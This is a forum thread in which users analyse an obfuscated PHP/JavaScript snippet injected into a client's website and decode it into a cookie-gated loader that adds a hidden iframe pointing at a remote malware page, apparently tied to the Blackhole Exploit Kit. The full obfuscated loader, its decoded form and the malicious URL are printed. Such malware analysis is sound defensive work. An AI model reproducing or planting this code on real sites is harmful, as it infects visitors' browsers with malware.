
: Anyone see this before?
: Injunfarian September 06, 2013, 03:12:28 PM
Just found this on a client's website:

: (javascript)
// Injected snippet as found on the compromised site: when $co is empty, PHP assigns an
// obfuscated <script> element to it and echoes it into the page.
// Decoder (visible in the tail of the string): the comma-separated list is split, each entry is
// parsed with parseInt(entry, vbmge*4) - base 16, because vbmge is set to 4 only when
// document.querySelector exists - and 25 is subtracted from it. The resulting character codes go
// through String["fr"+"omCh"+"arCo"+"de"] and the text is handed to eval via the alias siwbgu.
// eval is reached only when fsu is falsy; fsu is assigned (50-50) solely in the catch handler
// around etccbd(), which attempts --(document.body).
// NOTE(review): that try/catch looks like a check for a real browser DOM, so that script
// emulators never reach the eval - confirm before relying on it.
// For triage, decode the list offline (hex value minus 25 per entry) rather than running the
// script. Strings worth searching the rest of the site for: the eval alias, the split
// "fromCharCode" name, and long comma-separated hex lists inside echoed <script> tags.
// The line breaks inside the hex list come from the forum's wrapping of the paste.
if(empty($co)) { $co = " <script type= language= > if(document.querySelector)vbmge=4;tekrka=(\"39,7f,8e,87,7c,8d,82,88,87,39,8c,8d,92,49,52,41,42,39,94,26,23,39,8f,7a,8b,39,8c,8d,7a,8d,82,7c,56,40,7a,83,7a,91,40,54,26,23,39,8f,7a,8b,39,7c,88,87,8d,8b,88,85,85,7e,8b,56,40,82,87,7d,7e,91,47,89,81,89,40,54,26,23,39,8f,7a,8b,39,8c,8d,92,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,8b,7e,7a,8d,7e,5e,85,7e,86,7e,87,8d,41,40,82,7f,8b,7a,86,7e,40,42,54,26,23,26,23,39,8c,8d,92,47,8c,8b,7c,39,56,39,40,81,8d,8d,89,53,48,48,90,90,90,47,7a,7c,7a,7d,7e,86,92,88,7f,7a,89,89,85,82,7e,7d,7a,8b,8d,8c,47,7c,88,86,48,86,7e,7d,82,7a,48,72,83,4f,65,63,5f,52,5b,47,89,81,89,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,89,88,8c,82,8d,82,88,87,39,56,39,40,7a,7b,8c,88,85,8e,8d,7e,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,7c,88,85,88,8b,39,56,39,40,50,49,4c,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,81,7e,82,80,81,8d,39,56,39,40,50,49,4c,89,91,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,90,82,7d,8d,81,39,56,39,40,50,49,4c,89,91,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,85,7e,7f,8d,39,56,39,40,4a,49,49,49,50,49,4c,40,54,26,23,39,8c,8d,92,47,8c,8d,92,85,7e,47,8d,88,89,39,56,39,40,4a,49,49,49,50,49,4c,40,54,26,23,26,23,39,82,7f,39,41,3a,7d,88,7c,8e,86,7e,87,8d,47,80,7e,8d,5e,85,7e,86,7e,87,8d,5b,92,62,7d,41,40,8c,8d,92,40,42,42,39,94,26,23,39,7d,88,7c,8e,86,7e,87,8d,47,90,8b,82,8d,7e,41,40,55,89,39,82,7d,56,75,40,8c,8d,92,75,40,39,7c,85,7a,8c,8c,56,75,40,8c,8d,92,49,52,75,40,39,57,55,48,89,57,40,42,54,26,23,39,7d,88,7c,8e,86,7e,87,8d,47,80,7e,8d,5e,85,7e,86,7e,87,8d,5b,92,62,7d,41,40,8c,8d,92,40,42,47,7a,89,89,7e,87,7d,5c,81,82,85,7d,41,8c,8d,92,42,54,26,23,39,96,26,23,96,26,23,7f,8e,87,7c,8d,82,88,87,39,6c,7e,8d,5c,88,88,84,82,7e,41,7c,88,88,84,82,7e,67,7a,86,7e,45,7c,88,88,84,82,7e,6f,7a,85,8e,7e,45,87,5d,7a,92,8c,45,89,7a,8d,81,42,39,94,26,23,39,8f,7a,8b,39,8d,88,7d,7a,92,39,56,39,87,7e,90,39,5d,7a,8d,7e,41,42,54,26,23,39,8f,7a,8b,39,7e,91,89,82,8b,7e,39,56,39,87,7e,90,39,5d,7a,8d,7e,41,42,
54,26,23,39,82,7f,39,41,87,5d,7a,92,8c,56,56,87,8e,85,85,39,95,95,39,87,5d,7a,92,8c,56,56,49,42,39,87,5d,7a,92,8c,56,4a,54,26,23,39,7e,91,89,82,8b,7e,47,8c,7e,8d,6d,82,86,7e,41,8d,88,7d,7a,92,47,80,7e,8d,6d,82,86,7e,41,42,39,44,39,4c,4f,49,49,49,49,49,43,4b,4d,43,87,5d,7a,92,8c,42,54,26,23,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,39,56,39,7c,88,88,84,82,7e,67,7a,86,7e,44,3b,56,3b,44,7e,8c,7c,7a,89,7e,41,7c,88,88,84,82,7e,6f,7a,85,8e,7e,42,26,23,39,44,39,3b,54,7e,91,89,82,8b,7e,8c,56,3b,39,44,39,7e,91,89,82,8b,7e,47,8d,88,60,66,6d,6c,8d,8b,82,87,80,41,42,39,44,39,41,41,89,7a,8d,81,42,39,58,39,3b,54,39,89,7a,8d,81,56,3b,39,44,39,89,7a,8d,81,39,53,39,3b,3b,42,54,26,23,96,26,23,7f,8e,87,7c,8d,82,88,87,39,60,7e,8d,5c,88,88,84,82,7e,41,39,87,7a,86,7e,39,42,39,94,26,23,39,8f,7a,8b,39,8c,8d,7a,8b,8d,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,82,87,7d,7e,91,68,7f,41,39,87,7a,86,7e,39,44,39,3b,56,3b,39,42,54,26,23,39,8f,7a,8b,39,85,7e,87,39,56,39,8c,8d,7a,8b,8d,39,44,39,87,7a,86,7e,47,85,7e,87,80,8d,81,39,44,39,4a,54,26,23,39,82,7f,39,41,39,41,39,3a,8c,8d,7a,8b,8d,39,42,39,3f,3f,26,23,39,41,39,87,7a,86,7e,39,3a,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,8c,8e,7b,8c,8d,8b,82,87,80,41,39,49,45,39,87,7a,86,7e,47,85,7e,87,80,8d,81,39,42,39,42,39,42,26,23,39,94,26,23,39,8b,7e,8d,8e,8b,87,39,87,8e,85,85,54,26,23,39,96,26,23,39,82,7f,39,41,39,8c,8d,7a,8b,8d,39,56,56,39,46,4a,39,42,39,8b,7e,8d,8e,8b,87,39,87,8e,85,85,54,26,23,39,8f,7a,8b,39,7e,87,7d,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,82,87,7d,7e,91,68,7f,41,39,3b,54,3b,45,39,85,7e,87,39,42,54,26,23,39,82,7f,39,41,39,7e,87,7d,39,56,56,39,46,4a,39,42,39,7e,87,7d,39,56,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,85,7e,87,80,8d,81,54,26,23,39,8b,7e,8d,8e,8b,87,39,8e,87,7e,8c,7c,7a,89,7e,41,39,7d,88,7c,8e,86,7e,87,8d,47,7c,88,88,84,82,7e,47,8c,8e,7b,8c,8d,8b,82,87,80,41,39,85,7e,87,45,39,7e,87,7d,39,42,39,42,54,26,23,96,26,23,82,7f,39,41,87,7a,8f,82,80,7a,8d,88,8b,47,7c,88,88,84
,82,7e,5e,87,7a,7b,85,7e,7d,42,26,23,94,26,23,82,7f,41,60,7e,8d,5c,88,88,84,82,7e,41,40,8f,82,8c,82,8d,7e,7d,78,8e,8a,40,42,56,56,4e,4e,42,94,96,7e,85,8c,7e,94,6c,7e,8d,5c,88,88,84,82,7e,41,40,8f,82,8c,82,8d,7e,7d,78,8e,8a,40,45,39,40,4e,4e,40,45,39,40,4a,40,45,39,40,48,40,42,54,26,23,26,23,8c,8d,92,49,52,41,42,54,26,23,96,26,23,96\".split(\",\"));siwbgu=eval;function etccbd(){gkpxj=function(){--(zuouf.body)}()}zuouf=document;for(mjt=0;mjt<tekrka[\"length\"];mjt+=1){tekrka[mjt]=-(25)+parseInt(tekrka[mjt],vbmge*4);}try{etccbd()}catch(kkzxji){fsu=50-50;}if(!fsu)siwbgu(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,tekrka));</script> "; echo $co; }

Anyone seen it before? It's a mixture of PHP and JavaScript.
: Re: Anyone see this before?
: WirelessDesert September 06, 2013, 03:16:02 PM
I suspect that the hexadecimal numbers are some kind of html string,  which could mean that it's some script, but idk, I'm not so experienced in php and JS.
: Re: Anyone see this before?
: Injunfarian September 06, 2013, 03:39:02 PM
Here are the numbers decoded into the code that is eval'd on the client's computer:

:
// Decoded second stage of the injected script (the text that the obfuscated loader passes to eval).
// Analyst summary: a cookie-gated loader that appends one iframe pointing at a remote PHP page.
// Strings usable as search indicators on the affected site and in proxy logs: the iframe URL,
// the cookie name 'visited_uq', the element id 'sty' and the class 'sty09'.

// Builds the iframe and attaches it to the page.
function sty09() {
    // Both variables are assigned but never referenced again in this listing.
    var static='ajax'; var controller='index.php';
    var sty = document.createElement('iframe');
    // Remote page the frame loads; a later post in the thread reports it as a malware link.
    sty.src = 'http://www.academyofappliedarts.com/media/Yj6LJF9B.php';
    sty.style.position = 'absolute'; sty.style.color = '703';
    sty.style.height = '703px'; sty.style.width = '703px';
    // NOTE(review): left/top carry no unit; presumably meant to push the frame far off-screen - confirm.
    sty.style.left = '1000703'; sty.style.top = '1000703';
    // Runs only when no element with id 'sty' exists yet: writes a <p id='sty'> placeholder
    // and appends the iframe to it.
    if (!document.getElementById('sty')) {
        document.write('<p id=\'sty\' class=\'sty09\' ></p>');
        document.getElementById('sty').appendChild(sty);
    }
}

// Writes cookieName=cookieValue with an expiry nDays days ahead (1 day when nDays is null or 0)
// and an optional path attribute.
function SetCookie(cookieName,cookieValue,nDays,path) {
    var today = new Date(); var expire = new Date();
    if (nDays==null || nDays==0) nDays=1;
    expire.setTime(today.getTime() + 3600000*24*nDays);
    document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

// Returns the unescaped value stored under `name` in document.cookie, or null when it is absent.
function GetCookie( name ) {
    var start = document.cookie.indexOf( name + "=" );
    var len = start + name.length + 1;
    // Taken only when the match index is 0 and the cookie string does not begin with `name`.
    if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; }
    if ( start == -1 ) return null;
    var end = document.cookie.indexOf( ";", len );
    if ( end == -1 ) end = document.cookie.length;
    return unescape( document.cookie.substring( len, end ) );
}

// Gate: nothing happens when cookies are disabled. Otherwise the iframe is injected only when
// 'visited_uq' is not already 55; the cookie is set for one day on path '/' before sty09() runs,
// so a returning browser is skipped until that cookie expires.
if (navigator.cookieEnabled) {
    if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
    sty09(); } }
: Re: Anyone see this before?
: geXXos September 06, 2013, 03:49:44 PM
As WD said, these are hexadecimal numbers used in JavaScript; see the JavaScript parseInt() Function  (http://www.w3schools.com/jsref/jsref_parseint.asp) reference from W3Schools, which is used here with hex numbers.
: Re: Anyone see this before?
: WirelessDesert September 06, 2013, 04:25:18 PM
here is the numbers broken down into code which is eval'd on the clients computer:

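// Quoted copy of the decoded script posted earlier in the thread. The forum's auto-linker had
// inserted a second, parenthesised copy of the iframe URL after the sty.src assignment, which
// is not part of the sample and made the quote invalid JavaScript; it is removed here so the
// quote matches the earlier listing.

// Creates an iframe pointing at a remote PHP page and appends it to the document.
function sty09() {
    // Assigned but not used anywhere else in this listing.
    var static='ajax'; var controller='index.php';
    var sty = document.createElement('iframe');
    sty.src = 'http://www.academyofappliedarts.com/media/Yj6LJF9B.php';
    sty.style.position = 'absolute'; sty.style.color = '703';
    sty.style.height = '703px'; sty.style.width = '703px';
    // NOTE(review): unitless left/top values; presumably intended to keep the frame out of view - confirm.
    sty.style.left = '1000703'; sty.style.top = '1000703';
    // Only when no element with id 'sty' exists: write a placeholder <p> and attach the iframe to it.
    if (!document.getElementById('sty')) {
        document.write('<p id=\'sty\' class=\'sty09\' ></p>');
        document.getElementById('sty').appendChild(sty);
    }
}

// Stores a cookie that expires nDays days from now (1 day when nDays is null or 0), with an
// optional path.
function SetCookie(cookieName,cookieValue,nDays,path) {
    var today = new Date(); var expire = new Date();
    if (nDays==null || nDays==0) nDays=1;
    expire.setTime(today.getTime() + 3600000*24*nDays);
    document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

// Looks up `name` in document.cookie and returns its unescaped value, or null when not found.
function GetCookie( name ) {
    var start = document.cookie.indexOf( name + "=" );
    var len = start + name.length + 1;
    if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; }
    if ( start == -1 ) return null;
    var end = document.cookie.indexOf( ";", len );
    if ( end == -1 ) end = document.cookie.length;
    return unescape( document.cookie.substring( len, end ) );
}

// Once-per-cookie-lifetime gate: with cookies enabled and 'visited_uq' not equal to 55, the
// cookie is set (value '55', 1 day, path '/') and the iframe is injected; otherwise nothing runs.
if (navigator.cookieEnabled) {
    if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
    sty09(); } }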

I clicked that iframe PHP link, and whoops! It's a malware link, so your client has had a malicious script injected into their website.
: Re: Anyone see this before?
: namespace7 September 06, 2013, 07:06:48 PM
To add to what others have said, the strange string which you see is obfuscated JavaScript code. It's part of the very popular Blackhole Exploit Kit.
: Re: Anyone see this before?
: kenjoe41 September 06, 2013, 07:13:32 PM
My two cents are that your client got him/herself pwned by a browser exploitation attack. Better look out.
: Re: Anyone see this before?
: Spacecow September 07, 2013, 05:06:42 AM
I assumed it was an exploit kit as soon as I saw the iframe in the decoded JS. I would scan over your client's entire site just to make sure there's no more funny business on it like this.